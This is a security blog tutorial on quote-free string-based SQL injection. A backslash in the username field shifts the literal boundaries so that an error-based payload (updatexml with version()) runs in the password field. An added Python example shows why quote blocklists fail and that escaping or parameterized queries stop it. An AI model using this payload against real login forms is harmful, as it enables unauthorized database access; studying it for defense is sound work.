[Without Quotes] String Based SQL Injection

Mukarram Khalid • October 15, 2015


Today, I'm going to discuss a special case of string-based SQL injection where you can perform the injection without using any quotes. You heard it right: absolutely no quotes at all in a string-based injection. This may come in handy if quotes are blocked.

This may not work everywhere, but I actually found this vulnerability on a sub-domain of a high profile target. I've created a demo with a very similar scenario to show you guys how it actually works. You can watch this video for a detailed demo.

The idea is to reuse the quotes that are already present in the back-end SQL query. We escape the quote we don't need so that it becomes part of the input string, and the next quote in the query takes over its role.

For example, let's say the back-end query looks like:

SELECT * from tbl_admin where username='$username' and password='$password' limit 0,1

In the username parameter, we insert a backslash \ to escape the closing quote, so the opening quote of the password value becomes the closing quote of the username string. The password field then sits outside any string literal, and we can inject there just like an integer-based SQL injection, without using quotes.

SELECT * from tbl_admin where username='\' and password=' and updatexml(null, concat(0x3a, version() ) ,null) -- -' limit 0,1
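As an added example (not from the post), the following Python shows why a quote blocklist lets this input through and how a MySQL-style parser splits the resulting query into string literals, with and without proper escaping; the escape_mysql helper is a simplified stand-in for the database driver's escaping and assumes a single-byte charset.

```python
# Added example (not from the post): how a MySQL-style parser sees the query.
TEMPLATE = "SELECT * from tbl_admin where username='{u}' and password='{p}' limit 0,1"

# Inputs taken from the post: a lone backslash for username, the quote-free payload for password.
USERNAME = "\\"
PASSWORD = " and updatexml(null, concat(0x3a, version() ) ,null) -- -"


def passes_quote_filter(s: str) -> bool:
    """The blocklist the post mentions: reject any input containing a quote character."""
    return "'" not in s and '"' not in s


def build_unsafe(username: str, password: str) -> str:
    """Interpolates raw input into the query, as the vulnerable back end does."""
    return TEMPLATE.format(u=username, p=password)


def escape_mysql(s: str) -> str:
    """Minimal MySQL-style escaping (backslash first, then quotes); assumes a single-byte charset."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def build_escaped(username: str, password: str) -> str:
    """Same query shape, but every input goes through escape_mysql first."""
    return TEMPLATE.format(u=escape_mysql(username), p=escape_mysql(password))


def string_literals(sql: str) -> list:
    """Return the contents of each single-quoted literal, honouring MySQL's backslash and ''
    escapes inside literals and stopping at a '-- ' or '#' comment outside them."""
    literals, i, n = [], 0, len(sql)
    while i < n:
        if sql[i] != "'":
            if sql.startswith("-- ", i) or sql[i] == "#":
                break  # the rest of the line is a comment
            i += 1
            continue
        buf, j = [], i + 1
        while j < n:
            if sql[j] == "\\" and j + 1 < n:      # backslash escape: next char is data
                buf.append(sql[j + 1])
                j += 2
            elif sql[j] == "'" and j + 1 < n and sql[j + 1] == "'":  # '' escape
                buf.append("'")
                j += 2
            elif sql[j] == "'":                   # unescaped quote closes the literal
                break
            else:
                buf.append(sql[j])
                j += 1
        literals.append("".join(buf))
        i = j + 1
    return literals


if __name__ == "__main__":
    print(string_literals(build_unsafe(USERNAME, PASSWORD)))   # one literal: payload is outside it
    print(string_literals(build_escaped(USERNAME, PASSWORD)))  # two literals: payload stays data
```

Escaping is shown only to make the literal boundaries visible; the robust fix is a parameterized query, which never builds the SQL string from input at all.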

Please watch the video for a better understanding. If you have any further suggestions, drop me a PM. Contact details are in the footer.